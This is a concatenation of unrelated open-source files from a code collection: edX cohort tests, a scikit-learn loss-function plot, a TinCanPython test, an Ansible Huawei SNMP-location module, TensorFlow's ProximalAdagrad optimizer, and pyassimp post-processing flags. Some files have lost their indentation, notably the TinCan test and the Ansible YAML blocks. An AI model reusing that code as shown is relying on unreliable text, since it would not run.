        self.first_cohort = CohortFactory(course_id=self.course.id, name="FirstCohort")
        self.second_cohort = CohortFactory(course_id=self.course.id, name="SecondCohort")
        # Arbitrary partition/group ids used to build links in the tests below.
        self.partition_id = 1
        self.group1_id = 10
        self.group2_id = 20

    def _link_cohort_partition_group(self, cohort, partition_id, group_id):
        """
        Utility to create cohort -> partition group assignments in the database.
        """
        link = CourseUserGroupPartitionGroup(
            course_user_group=cohort,
            partition_id=partition_id,
            group_id=group_id,
        )
        link.save()
        return link

    def test_get_group_info_for_cohort(self):
        """
        Basic test of the partition_group_info accessor function
        """
        # api should return nothing for an unmapped cohort
        self.assertEqual(
            cohorts.get_group_info_for_cohort(self.first_cohort),
            (None, None),
        )
        # create a link for the cohort in the db
        link = self._link_cohort_partition_group(
            self.first_cohort,
            self.partition_id,
            self.group1_id
        )
        # api should return the specified group and partition (in that order)
        self.assertEqual(
            cohorts.get_group_info_for_cohort(self.first_cohort),
            (self.group1_id, self.partition_id)
        )
        # delete the link in the db
        link.delete()
        # api should return nothing again
        self.assertEqual(
            cohorts.get_group_info_for_cohort(self.first_cohort),
            (None, None),
        )

    @ddt.data(
        (True, 1),
        (False, 3),
    )
    @ddt.unpack
    def test_get_group_info_for_cohort_queries(self, use_cached, num_sql_queries):
        """
        Basic test of the partition_group_info accessor function

        Three identical lookups: with caching only the first hits the database.
        """
        # create a link for the cohort in the db
        self._link_cohort_partition_group(
            self.first_cohort,
            self.partition_id,
            self.group1_id
        )
        with self.assertNumQueries(num_sql_queries):
            for __ in range(3):
                self.assertIsNotNone(cohorts.get_group_info_for_cohort(self.first_cohort, use_cached=use_cached))

    def test_multiple_cohorts(self):
        """
        Test that multiple cohorts can be linked to the same partition group
        """
        self._link_cohort_partition_group(
            self.first_cohort,
            self.partition_id,
            self.group1_id,
        )
        self._link_cohort_partition_group(
            self.second_cohort,
            self.partition_id,
            self.group1_id,
        )
        self.assertEqual(
            cohorts.get_group_info_for_cohort(self.first_cohort),
            (self.group1_id, self.partition_id),
        )
        self.assertEqual(
            cohorts.get_group_info_for_cohort(self.second_cohort),
            cohorts.get_group_info_for_cohort(self.first_cohort),
        )

    def test_multiple_partition_groups(self):
        """
        Test that a cohort cannot be mapped to more than one partition group
        """
        self._link_cohort_partition_group(
            self.first_cohort,
            self.partition_id,
            self.group1_id,
        )
        # Second link for the same cohort violates the DB uniqueness constraint.
        with self.assertRaises(IntegrityError):
            self._link_cohort_partition_group(
                self.first_cohort,
                self.partition_id,
                self.group2_id,
            )

    def test_delete_cascade(self):
        """
        Test that cohort -> partition group links are automatically deleted
        when their parent cohort is deleted.
        """
        self._link_cohort_partition_group(
            self.first_cohort,
            self.partition_id,
            self.group1_id
        )
        self.assertEqual(
            cohorts.get_group_info_for_cohort(self.first_cohort),
            (self.group1_id, self.partition_id)
        )
        # delete the link
        self.first_cohort.delete()
        # api should return nothing at that point
        self.assertEqual(
            cohorts.get_group_info_for_cohort(self.first_cohort),
            (None, None),
        )
        # link should no longer exist because of delete cascade
        with self.assertRaises(CourseUserGroupPartitionGroup.DoesNotExist):
            CourseUserGroupPartitionGroup.objects.get(
                course_user_group_id=self.first_cohort.id
            )
| agpl-3.0 |
kashif/scikit-learn | examples/linear_model/plot_sgd_loss_functions.py | 73 | 1232 | """
==========================
SGD: convex loss functions
==========================
A plot that compares the various convex loss functions supported by
:class:`sklearn.linear_model.SGDClassifier` .
"""
print(__doc__)
import numpy as np
import matplotlib.pyplot as plt
def modified_huber_loss(y_true, y_pred):
    """Return the modified Huber loss at margin ``z = y_true * y_pred``.

    Piecewise definition: the linear branch ``-4 * z`` for ``z < -1``,
    the quadratic branch ``(1 - z) ** 2`` for ``-1 <= z < 1``, and zero
    once the margin reaches 1.
    """
    margin = np.asarray(y_true) * np.asarray(y_pred)
    # Quadratic region, clipped to zero past margin 1.
    quadratic = np.where(margin >= 1.0, 0.0, (1.0 - margin) ** 2)
    # Below margin -1 the loss grows linearly with slope -4.
    return np.where(margin >= -1, quadratic, -4.0 * margin)
# Plot each convex surrogate loss as a function of the decision value f(x),
# for a positive example (y = 1), over the range [xmin, xmax].
xmin, xmax = -4, 4
xx = np.linspace(xmin, xmax, 100)
lw = 2  # shared line width for all curves
# Zero-one loss: step function, 1 for f(x) < 0 and 0 otherwise.
plt.plot([xmin, 0, 0, xmax], [1, 1, 0, 0], color='gold', lw=lw,
         label="Zero-one loss")
# Hinge: max(0, 1 - f(x)).
plt.plot(xx, np.where(xx < 1, 1 - xx, 0), color='teal', lw=lw,
         label="Hinge loss")
# Perceptron: max(0, -f(x)).
plt.plot(xx, -np.minimum(xx, 0), color='yellowgreen', lw=lw,
         label="Perceptron loss")
# Log loss, base 2 so it passes through 1 at f(x) = 0.
plt.plot(xx, np.log2(1 + np.exp(-xx)), color='cornflowerblue', lw=lw,
         label="Log loss")
# Squared hinge: max(0, 1 - f(x)) ** 2.
plt.plot(xx, np.where(xx < 1, 1 - xx, 0) ** 2, color='orange', lw=lw,
         label="Squared hinge loss")
plt.plot(xx, modified_huber_loss(xx, 1), color='darkorchid', lw=lw,
         linestyle='--', label="Modified Huber loss")
plt.ylim((0, 8))
plt.legend(loc="upper right")
plt.xlabel(r"Decision function $f(x)$")
plt.ylabel("$L(y, f(x))$")
plt.show()
| bsd-3-clause |
brianjmiller/TinCanPython | test/typedlist_test.py | 2 | 1028 | # Copyright 2014 Rustici Software
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
if __name__ == '__main__':
from main import setup_tincan_path
setup_tincan_path()
from tincan import TypedList
class TypedListTest(unittest.TestCase):
    """Unit tests for tincan.TypedList."""

    def test_Init(self):
        # A bare TypedList() must raise ValueError -- presumably because the
        # list requires a concrete element type; verify against TypedList docs.
        with self.assertRaises(ValueError):
            TypedList()
if __name__ == "__main__":
suite = unittest.TestLoader().loadTestsFromTestCase(TypedListTest)
unittest.TextTestRunner(verbosity=2).run(suite)
| apache-2.0 |
lmazuel/ansible | lib/ansible/modules/network/cloudengine/ce_snmp_location.py | 39 | 6774 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.0'}
DOCUMENTATION = '''
---
module: ce_snmp_location
version_added: "2.4"
short_description: Manages SNMP location configuration on HUAWEI CloudEngine switches.
description:
- Manages SNMP location configurations on HUAWEI CloudEngine switches.
author:
- wangdezhuang (@CloudEngine-Ansible)
options:
location:
description:
- Location information.
required: true
default: null
state:
description:
- Manage the state of the resource.
required: false
default: present
choices: ['present','absent']
'''
EXAMPLES = '''
- name: CloudEngine snmp location test
hosts: cloudengine
connection: local
gather_facts: no
vars:
cli:
host: "{{ inventory_hostname }}"
port: "{{ ansible_ssh_port }}"
username: "{{ username }}"
password: "{{ password }}"
transport: cli
tasks:
- name: "Config SNMP location"
ce_snmp_location:
state: present
location: nanjing China
provider: "{{ cli }}"
- name: "Remove SNMP location"
ce_snmp_location:
state: absent
location: nanjing China
provider: "{{ cli }}"
'''
RETURN = '''
changed:
description: check to see if a change was made on the device
returned: always
type: boolean
sample: true
proposed:
description: k/v pairs of parameters passed into module
returned: always
type: dict
sample: {"location": "nanjing China",
"state": "present"}
existing:
description: k/v pairs of existing aaa server
returned: always
type: dict
sample: {}
end_state:
description: k/v pairs of aaa params after module execution
returned: always
type: dict
sample: {"location": "nanjing China"}
updates:
description: command sent to the device
returned: always
type: list
sample: ["snmp-agent sys-info location nanjing China"]
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ce import get_config, load_config, ce_argument_spec
class SnmpLocation(object):
    """ Manages SNMP location configuration

    Reads the desired state from the Ansible module parameters, compares it
    with the device's running configuration (retrieved over CLI), and issues
    the minimal set/undo commands needed to converge.
    """

    def __init__(self, **kwargs):
        """ Class init

        :param argument_spec: the AnsibleModule argument spec (required key).
        """
        # module
        argument_spec = kwargs["argument_spec"]
        self.spec = argument_spec
        self.module = AnsibleModule(argument_spec=self.spec, supports_check_mode=True)
        # config: currently-configured location, populated by get_existing()
        self.cur_cfg = dict()
        # module args
        self.state = self.module.params['state']
        self.location = self.module.params['location']
        # state: result bookkeeping returned to Ansible in exit_json()
        self.changed = False
        self.updates_cmd = list()
        self.results = dict()
        self.proposed = dict()
        self.existing = dict()
        self.end_state = dict()

    def check_args(self):
        """ Check invalid args

        Fails the module unless location is a non-empty string of at most
        255 characters.
        """
        if self.location:
            if len(self.location) > 255 or len(self.location) < 1:
                self.module.fail_json(
                    msg='Error: The len of location %s is out of [1 - 255].' % self.location)
        else:
            # Empty string (the spec makes the parameter itself required).
            self.module.fail_json(
                msg='Error: The len of location is 0.')

    def get_proposed(self):
        """ Get proposed state """
        self.proposed["state"] = self.state
        if self.location:
            self.proposed["location"] = self.location

    def get_existing(self):
        """ Get existing state """
        tmp_cfg = self.cli_get_config()
        if tmp_cfg:
            # NOTE(review): splitting on "location " assumes that word appears
            # exactly once before the value and never inside the value itself --
            # a configured location containing "location " would be truncated.
            # (The r-prefix on the literal is inert; it contains no escapes.)
            temp_data = tmp_cfg.split(r"location ")
            self.cur_cfg["location"] = temp_data[1]
            self.existing["location"] = temp_data[1]

    def get_end_state(self):
        """ Get end state """
        tmp_cfg = self.cli_get_config()
        if tmp_cfg:
            temp_data = tmp_cfg.split(r"location ")
            self.end_state["location"] = temp_data[1]

    def cli_load_config(self, commands):
        """ Load config by cli

        Skipped in check mode so the device is never modified.
        """
        if not self.module.check_mode:
            load_config(self.module, commands)

    def cli_get_config(self):
        """ Get config by cli

        Returns the running-config line(s) matching the SNMP location filter.
        """
        regular = "| include snmp | include location"
        flags = list()
        flags.append(regular)
        tmp_cfg = get_config(self.module, flags)
        return tmp_cfg

    def set_config(self):
        """ Set configure by cli """
        cmd = "snmp-agent sys-info location %s" % self.location
        self.updates_cmd.append(cmd)
        cmds = list()
        cmds.append(cmd)
        self.cli_load_config(cmds)
        self.changed = True

    def undo_config(self):
        """ Undo configure by cli """
        cmd = "undo snmp-agent sys-info location"
        self.updates_cmd.append(cmd)
        cmds = list()
        cmds.append(cmd)
        self.cli_load_config(cmds)
        self.changed = True

    def work(self):
        """ Main work function

        Validates args, diffs proposed vs existing state, applies the change
        if needed, and exits the module with the result dictionary.
        """
        self.check_args()
        self.get_proposed()
        self.get_existing()
        if self.state == "present":
            # Only write when the configured location differs from the request.
            if "location" in self.cur_cfg.keys() and self.location == self.cur_cfg["location"]:
                pass
            else:
                self.set_config()
        else:
            # absent: only remove when the device's location matches the request.
            if "location" in self.cur_cfg.keys() and self.location == self.cur_cfg["location"]:
                self.undo_config()
        self.get_end_state()
        self.results['changed'] = self.changed
        self.results['proposed'] = self.proposed
        self.results['existing'] = self.existing
        self.results['end_state'] = self.end_state
        self.results['updates'] = self.updates_cmd
        self.module.exit_json(**self.results)
def main():
    """Entry point: build the argument spec and run the SNMP location module."""
    # Module-specific options, merged with the common CloudEngine spec.
    spec = {
        'state': dict(choices=['present', 'absent'], default='present'),
        'location': dict(type='str', required=True),
    }
    spec.update(ce_argument_spec)
    snmp_location = SnmpLocation(argument_spec=spec)
    snmp_location.work()


if __name__ == '__main__':
    main()
| gpl-3.0 |
aam-at/tensorflow | tensorflow/python/training/proximal_adagrad.py | 21 | 5744 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""ProximalAdagrad for TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import ops
from tensorflow.python.ops import math_ops
from tensorflow.python.training import optimizer
from tensorflow.python.training import training_ops
from tensorflow.python.util.tf_export import tf_export
@tf_export(v1=["train.ProximalAdagradOptimizer"])
class ProximalAdagradOptimizer(optimizer.Optimizer):
  # pylint: disable=line-too-long
  """Optimizer that implements the Proximal Adagrad algorithm.

  References:
    Adaptive Subgradient Methods for Online Learning and Stochastic Optimization:
      [Duchi et al., 2011](http://jmlr.org/papers/v12/duchi11a.html)
      ([pdf](http://www.jmlr.org/papers/volume12/duchi11a/duchi11a.pdf))
    Efficient Learning using Forward-Backward Splitting:
      [Duchi et al., 2009](http://papers.nips.cc/paper/3793-efficient-learning-using-forward-backward-splitting)
      ([pdf](http://papers.nips.cc/paper/3793-efficient-learning-using-forward-backward-splitting.pdf))
  """

  def __init__(self, learning_rate, initial_accumulator_value=0.1,
               l1_regularization_strength=0.0, l2_regularization_strength=0.0,
               use_locking=False, name="ProximalAdagrad"):
    """Construct a new ProximalAdagrad optimizer.

    Args:
      learning_rate: A `Tensor` or a floating point value. The learning rate.
      initial_accumulator_value: A floating point value.
        Starting value for the accumulators, must be positive.
      l1_regularization_strength: A float value, must be greater than or
        equal to zero.
      l2_regularization_strength: A float value, must be greater than or
        equal to zero.
      use_locking: If `True` use locks for update operations.
      name: Optional name prefix for the operations created when applying
        gradients. Defaults to "ProximalAdagrad".

    Raises:
      ValueError: If the `initial_accumulator_value` is invalid.
    """
    # Adagrad divides by the square root of the accumulator, so it must
    # start strictly positive.
    if initial_accumulator_value <= 0.0:
      raise ValueError("initial_accumulator_value must be positive: %s" %
                       initial_accumulator_value)
    super(ProximalAdagradOptimizer, self).__init__(use_locking, name)
    self._learning_rate = learning_rate
    self._initial_accumulator_value = initial_accumulator_value
    self._l1_regularization_strength = l1_regularization_strength
    self._l2_regularization_strength = l2_regularization_strength
    # Tensor versions of the hyperparameters; created lazily in _prepare().
    self._l1_regularization_strength_tensor = None
    self._l2_regularization_strength_tensor = None
    self._learning_rate_tensor = None

  def _create_slots(self, var_list):
    # One "accumulator" slot per variable, colocated with the variable and
    # initialised to the configured starting value.
    for v in var_list:
      with ops.colocate_with(v):
        val = constant_op.constant(self._initial_accumulator_value,
                                   shape=v.get_shape(),
                                   dtype=v.dtype.base_dtype)
      self._get_or_make_slot(v, val, "accumulator", self._name)

  def _prepare(self):
    # Convert the Python-value hyperparameters to tensors once per apply.
    self._learning_rate_tensor = ops.convert_to_tensor(self._learning_rate,
                                                       name="learning_rate")
    self._l1_regularization_strength_tensor = ops.convert_to_tensor(
        self._l1_regularization_strength,
        name="l1_regularization_strength")
    self._l2_regularization_strength_tensor = ops.convert_to_tensor(
        self._l2_regularization_strength,
        name="l2_regularization_strength")

  def _apply_dense(self, grad, var):
    # Dense update for ref variables; delegates to the fused C++ kernel.
    acc = self.get_slot(var, "accumulator")
    return training_ops.apply_proximal_adagrad(
        var, acc, self._learning_rate_tensor,
        self._l1_regularization_strength_tensor,
        self._l2_regularization_strength_tensor,
        grad, use_locking=self._use_locking)

  def _resource_apply_dense(self, grad, var):
    # Dense update for resource variables (operates on handles).
    acc = self.get_slot(var, "accumulator")
    return training_ops.resource_apply_proximal_adagrad(
        var.handle, acc.handle, self._learning_rate_tensor,
        self._l1_regularization_strength_tensor,
        self._l2_regularization_strength_tensor,
        grad, use_locking=self._use_locking)

  def _apply_sparse(self, grad, var):
    # Sparse (IndexedSlices) update for ref variables.
    acc = self.get_slot(var, "accumulator")
    return training_ops.sparse_apply_proximal_adagrad(
        var, acc, self._learning_rate_tensor,
        self._l1_regularization_strength_tensor,
        self._l2_regularization_strength_tensor,
        grad.values, grad.indices,
        use_locking=self._use_locking)

  def _resource_apply_sparse(self, grad, var, indices):
    # Sparse update for resource variables; hyperparameters are cast to the
    # gradient dtype as required by the resource kernel.
    acc = self.get_slot(var, "accumulator")
    return training_ops.resource_sparse_apply_proximal_adagrad(
        var.handle, acc.handle,
        math_ops.cast(self._learning_rate_tensor, grad.dtype),
        math_ops.cast(self._l1_regularization_strength_tensor, grad.dtype),
        math_ops.cast(self._l2_regularization_strength_tensor, grad.dtype),
        grad, indices,
        use_locking=self._use_locking)
| apache-2.0 |
daviddeng/azrael | pyassimp/postprocess.py | 47 | 23509 | # <hr>Calculates the tangents and bitangents for the imported meshes.
#
# Does nothing if a mesh does not have normals. You might want this post
# processing step to be executed if you plan to use tangent space calculations
# such as normal mapping applied to the meshes. There's a config setting,
# <tt>#AI_CONFIG_PP_CT_MAX_SMOOTHING_ANGLE<tt>, which allows you to specify
# a maximum smoothing angle for the algorithm. However, usually you'll
# want to leave it at the default value.
#
aiProcess_CalcTangentSpace = 0x1
## <hr>Identifies and joins identical vertex data sets within all
# imported meshes.
#
# After this step is run, each mesh contains unique vertices,
# so a vertex may be used by multiple faces. You usually want
# to use this post processing step. If your application deals with
# indexed geometry, this step is compulsory or you'll just waste rendering
# time. <b>If this flag is not specified<b>, no vertices are referenced by
# more than one face and <b>no index buffer is required<b> for rendering.
#
aiProcess_JoinIdenticalVertices = 0x2
## <hr>Converts all the imported data to a left-handed coordinate space.
#
# By default the data is returned in a right-handed coordinate space (which
# OpenGL prefers). In this space, +X points to the right,
# +Z points towards the viewer, and +Y points upwards. In the DirectX
# coordinate space +X points to the right, +Y points upwards, and +Z points
# away from the viewer.
#
# You'll probably want to consider this flag if you use Direct3D for
# rendering. The #aiProcess_ConvertToLeftHanded flag supersedes this
# setting and bundles all conversions typically required for D3D-based
# applications.
#
aiProcess_MakeLeftHanded = 0x4
## <hr>Triangulates all faces of all meshes.
#
# By default the imported mesh data might contain faces with more than 3
# indices. For rendering you'll usually want all faces to be triangles.
# This post processing step splits up faces with more than 3 indices into
# triangles. Line and point primitives are #not# modified! If you want
# 'triangles only' with no other kinds of primitives, try the following
# solution:
# <ul>
# <li>Specify both #aiProcess_Triangulate and #aiProcess_SortByPType <li>
# <li>Ignore all point and line meshes when you process assimp's output<li>
# <ul>
#
aiProcess_Triangulate = 0x8
## <hr>Removes some parts of the data structure (animations, materials,
# light sources, cameras, textures, vertex components).
#
# The components to be removed are specified in a separate
# configuration option, <tt>#AI_CONFIG_PP_RVC_FLAGS<tt>. This is quite useful
# if you don't need all parts of the output structure. Vertex colors
# are rarely used today for example... Calling this step to remove unneeded
# data from the pipeline as early as possible results in increased
# performance and a more optimized output data structure.
# This step is also useful if you want to force Assimp to recompute
# normals or tangents. The corresponding steps don't recompute them if
# they're already there (loaded from the source asset). By using this
# step you can make sure they are NOT there.
#
# This flag is a poor one, mainly because its purpose is usually
# misunderstood. Consider the following case: a 3D model has been exported
# from a CAD app, and it has per-face vertex colors. Vertex positions can't be
# shared, thus the #aiProcess_JoinIdenticalVertices step fails to
# optimize the data because of these nasty little vertex colors.
# Most apps don't even process them, so it's all for nothing. By using
# this step, unneeded components are excluded as early as possible
# thus opening more room for internal optimizations.
#
aiProcess_RemoveComponent = 0x10
## <hr>Generates normals for all faces of all meshes.
#
# This is ignored if normals are already there at the time this flag
# is evaluated. Model importers try to load them from the source file, so
# they're usually already there. Face normals are shared between all points
# of a single face, so a single point can have multiple normals, which
# forces the library to duplicate vertices in some cases.
# #aiProcess_JoinIdenticalVertices is #senseless# then.
#
# This flag may not be specified together with #aiProcess_GenSmoothNormals.
#
aiProcess_GenNormals = 0x20
## <hr>Generates smooth normals for all vertices in the mesh.
#
# This is ignored if normals are already there at the time this flag
# is evaluated. Model importers try to load them from the source file, so
# they're usually already there.
#
# This flag may not be specified together with
# #aiProcess_GenNormals. There's a configuration option,
# <tt>#AI_CONFIG_PP_GSN_MAX_SMOOTHING_ANGLE<tt> which allows you to specify
# an angle maximum for the normal smoothing algorithm. Normals exceeding
# this limit are not smoothed, resulting in a 'hard' seam between two faces.
# Using a decent angle here (e.g. 80 degrees) results in very good visual
# appearance.
#
aiProcess_GenSmoothNormals = 0x40
## <hr>Splits large meshes into smaller sub-meshes.
#
# This is quite useful for real-time rendering, where the number of triangles
# which can be maximally processed in a single draw-call is limited
# by the video driverhardware. The maximum vertex buffer is usually limited
# too. Both requirements can be met with this step: you may specify both a
# triangle and vertex limit for a single mesh.
#
# The split limits can (and should!) be set through the
# <tt>#AI_CONFIG_PP_SLM_VERTEX_LIMIT<tt> and <tt>#AI_CONFIG_PP_SLM_TRIANGLE_LIMIT<tt>
# settings. The default values are <tt>#AI_SLM_DEFAULT_MAX_VERTICES<tt> and
# <tt>#AI_SLM_DEFAULT_MAX_TRIANGLES<tt>.
#
# Note that splitting is generally a time-consuming task, but only if there's
# something to split. The use of this step is recommended for most users.
#
aiProcess_SplitLargeMeshes = 0x80
## <hr>Removes the node graph and pre-transforms all vertices with
# the local transformation matrices of their nodes.
#
# The output scene still contains nodes, however there is only a
# root node with children, each one referencing only one mesh,
# and each mesh referencing one material. For rendering, you can
# simply render all meshes in order - you don't need to pay
# attention to local transformations and the node hierarchy.
# Animations are removed during this step.
# This step is intended for applications without a scenegraph.
# The step CAN cause some problems: if e.g. a mesh of the asset
# contains normals and another, using the same material index, does not,
# they will be brought together, but the first meshes's part of
# the normal list is zeroed. However, these artifacts are rare.
# @note The <tt>#AI_CONFIG_PP_PTV_NORMALIZE<tt> configuration property
# can be set to normalize the scene's spatial dimension to the -1...1
# range.
#
aiProcess_PreTransformVertices = 0x100
## <hr>Limits the number of bones simultaneously affecting a single vertex
# to a maximum value.
#
# If any vertex is affected by more than the maximum number of bones, the least
# important vertex weights are removed and the remaining vertex weights are
# renormalized so that the weights still sum up to 1.
# The default bone weight limit is 4 (defined as <tt>#AI_LMW_MAX_WEIGHTS<tt> in
# config.h), but you can use the <tt>#AI_CONFIG_PP_LBW_MAX_WEIGHTS<tt> setting to
# supply your own limit to the post processing step.
#
# If you intend to perform the skinning in hardware, this post processing
# step might be of interest to you.
#
aiProcess_LimitBoneWeights = 0x200
## <hr>Validates the imported scene data structure.
# This makes sure that all indices are valid, all animations and
# bones are linked correctly, all material references are correct .. etc.
#
# It is recommended that you capture Assimp's log output if you use this flag,
# so you can easily find out what's wrong if a file fails the
# validation. The validator is quite strict and will find #all#
# inconsistencies in the data structure... It is recommended that plugin
# developers use it to debug their loaders. There are two types of
# validation failures:
# <ul>
# <li>Error: There's something wrong with the imported data. Further
# postprocessing is not possible and the data is not usable at all.
# The import fails. #Importer::GetErrorString() or #aiGetErrorString()
# carry the error message around.<li>
# <li>Warning: There are some minor issues (e.g. 1000000 animation
# keyframes with the same time), but further postprocessing and use
# of the data structure is still safe. Warning details are written
# to the log file, <tt>#AI_SCENE_FLAGS_VALIDATION_WARNING<tt> is set
# in #aiScene::mFlags<li>
# <ul>
#
# This post-processing step is not time-consuming. Its use is not
# compulsory, but recommended.
#
aiProcess_ValidateDataStructure = 0x400
## <hr>Reorders triangles for better vertex cache locality.
#
# The step tries to improve the ACMR (average post-transform vertex cache
# miss ratio) for all meshes. The implementation runs in O(n) and is
# roughly based on the 'tipsify' algorithm (see <a href="
# http:www.cs.princeton.edugfxpubsSander_2007_%3ETRtipsy.pdf">this
# paper<a>).
#
# If you intend to render huge models in hardware, this step might
# be of interest to you. The <tt>#AI_CONFIG_PP_ICL_PTCACHE_SIZE<tt>config
# setting can be used to fine-tune the cache optimization.
#
aiProcess_ImproveCacheLocality = 0x800
## <hr>Searches for redundantunreferenced materials and removes them.
#
# This is especially useful in combination with the
# #aiProcess_PretransformVertices and #aiProcess_OptimizeMeshes flags.
# Both join small meshes with equal characteristics, but they can't do
# their work if two meshes have different materials. Because several
# material settings are lost during Assimp's import filters,
# (and because many exporters don't check for redundant materials), huge
# models often have materials which are are defined several times with
# exactly the same settings.
#
# Several material settings not contributing to the final appearance of
# a surface are ignored in all comparisons (e.g. the material name).
# So, if you're passing additional information through the
# content pipeline (probably using #magic# material names), don't
# specify this flag. Alternatively take a look at the
# <tt>#AI_CONFIG_PP_RRM_EXCLUDE_LIST<tt> setting.
#
aiProcess_RemoveRedundantMaterials = 0x1000
## <hr>This step tries to determine which meshes have normal vectors
# that are facing inwards and inverts them.
#
# The algorithm is simple but effective:
# the bounding box of all vertices + their normals is compared against
# the volume of the bounding box of all vertices without their normals.
# This works well for most objects, problems might occur with planar
# surfaces. However, the step tries to filter such cases.
# The step inverts all in-facing normals. Generally it is recommended
# to enable this step, although the result is not always correct.
#
aiProcess_FixInfacingNormals = 0x2000
## <hr>This step splits meshes with more than one primitive type in
# homogeneous sub-meshes.
#
# The step is executed after the triangulation step. After the step
# returns, just one bit is set in aiMesh::mPrimitiveTypes. This is
# especially useful for real-time rendering where point and line
# primitives are often ignored or rendered separately.
# You can use the <tt>#AI_CONFIG_PP_SBP_REMOVE<tt> option to specify which
# primitive types you need. This can be used to easily exclude
# lines and points, which are rarely used, from the import.
#
aiProcess_SortByPType = 0x8000
## <hr>This step searches all meshes for degenerate primitives and
# converts them to proper lines or points.
#
# A face is 'degenerate' if one or more of its points are identical.
# To have the degenerate stuff not only detected and collapsed but
# removed, try one of the following procedures:
# <br><b>1.<b> (if you support lines and points for rendering but don't
# want the degenerates)<br>
# <ul>
# <li>Specify the #aiProcess_FindDegenerates flag.
# <li>
# <li>Set the <tt>AI_CONFIG_PP_FD_REMOVE<tt> option to 1. This will
# cause the step to remove degenerate triangles from the import
# as soon as they're detected. They won't pass any further
# pipeline steps.
# <li>
# <ul>
# <br><b>2.<b>(if you don't support lines and points at all)<br>
# <ul>
# <li>Specify the #aiProcess_FindDegenerates flag.
# <li>
# <li>Specify the #aiProcess_SortByPType flag. This moves line and
# point primitives to separate meshes.
# <li>
# <li>Set the <tt>AI_CONFIG_PP_SBP_REMOVE<tt> option to
# @code aiPrimitiveType_POINTS | aiPrimitiveType_LINES
# @endcode to cause SortByPType to reject point
# and line meshes from the scene.
# <li>
# <ul>
# @note Degenerate polygons are not necessarily evil and that's why
# they're not removed by default. There are several file formats which
# don't support lines or points, and some exporters bypass the
# format specification and write them as degenerate triangles instead.
#
aiProcess_FindDegenerates = 0x10000
## <hr>This step searches all meshes for invalid data, such as zeroed
# normal vectors or invalid UV coords and removesfixes them. This is
# intended to get rid of some common exporter errors.
#
# This is especially useful for normals. If they are invalid, and
# the step recognizes this, they will be removed and can later
# be recomputed, i.e. by the #aiProcess_GenSmoothNormals flag.<br>
# The step will also remove meshes that are infinitely small and reduce
# animation tracks consisting of hundreds if redundant keys to a single
# key. The <tt>AI_CONFIG_PP_FID_ANIM_ACCURACY<tt> config property decides
# the accuracy of the check for duplicate animation tracks.
#
aiProcess_FindInvalidData = 0x20000
## <hr>This step converts non-UV mappings (such as spherical or
# cylindrical mapping) to proper texture coordinate channels.
#
# Most applications will support UV mapping only, so you will
# probably want to specify this step in every case. Note that Assimp is not
# always able to match the original mapping implementation of the
# 3D app which produced a model perfectly. It's always better to let the
# modelling app compute the UV channels - 3ds max, Maya, Blender,
# LightWave, and Modo do this for example.
#
# @note If this step is not requested, you'll need to process the
# <tt>#AI_MATKEY_MAPPING<tt> material property in order to display all assets
# properly.
#
aiProcess_GenUVCoords = 0x40000
## <hr>This step applies per-texture UV transformations and bakes
# them into stand-alone vtexture coordinate channels.
#
# UV transformations are specified per-texture - see the
# <tt>#AI_MATKEY_UVTRANSFORM<tt> material key for more information.
# This step processes all textures with
# transformed input UV coordinates and generates a new (pre-transformed) UV channel
# which replaces the old channel. Most applications won't support UV
# transformations, so you will probably want to specify this step.
#
# @note UV transformations are usually implemented in real-time apps by
# transforming texture coordinates at vertex shader stage with a 3x3
# (homogenous) transformation matrix.
#
aiProcess_TransformUVCoords = 0x80000
## <hr>This step searches for duplicate meshes and replaces them
# with references to the first mesh.
#
# This step takes a while, so don't use it if speed is a concern.
# Its main purpose is to workaround the fact that many export
# file formats don't support instanced meshes, so exporters need to
# duplicate meshes. This step removes the duplicates again. Please
# note that Assimp does not currently support per-node material
# assignment to meshes, which means that identical meshes with
# different materials are currently #not# joined, although this is
# planned for future versions.
#
aiProcess_FindInstances = 0x100000
## <hr>A postprocessing step to reduce the number of meshes.
#
# This will, in fact, reduce the number of draw calls.
#
# This is a very effective optimization and is recommended to be used
# together with #aiProcess_OptimizeGraph, if possible. The flag is fully
# compatible with both #aiProcess_SplitLargeMeshes and #aiProcess_SortByPType.
#
aiProcess_OptimizeMeshes = 0x200000
## <hr>A postprocessing step to optimize the scene hierarchy.
#
# Nodes without animations, bones, lights or cameras assigned are
# collapsed and joined.
#
# Node names can be lost during this step. If you use special 'tag nodes'
# to pass additional information through your content pipeline, use the
# <tt>#AI_CONFIG_PP_OG_EXCLUDE_LIST<tt> setting to specify a list of node
# names you want to be kept. Nodes matching one of the names in this list won't
# be touched or modified.
#
# Use this flag with caution. Most simple files will be collapsed to a
# single node, so complex hierarchies are usually completely lost. This is not
# useful for editor environments, but probably a very effective
# optimization if you just want to get the model data, convert it to your
# own format, and render it as fast as possible.
#
# This flag is designed to be used with #aiProcess_OptimizeMeshes for best
# results.
#
# @note 'Crappy' scenes with thousands of extremely small meshes packed
# in deeply nested nodes exist for almost all file formats.
# #aiProcess_OptimizeMeshes in combination with #aiProcess_OptimizeGraph
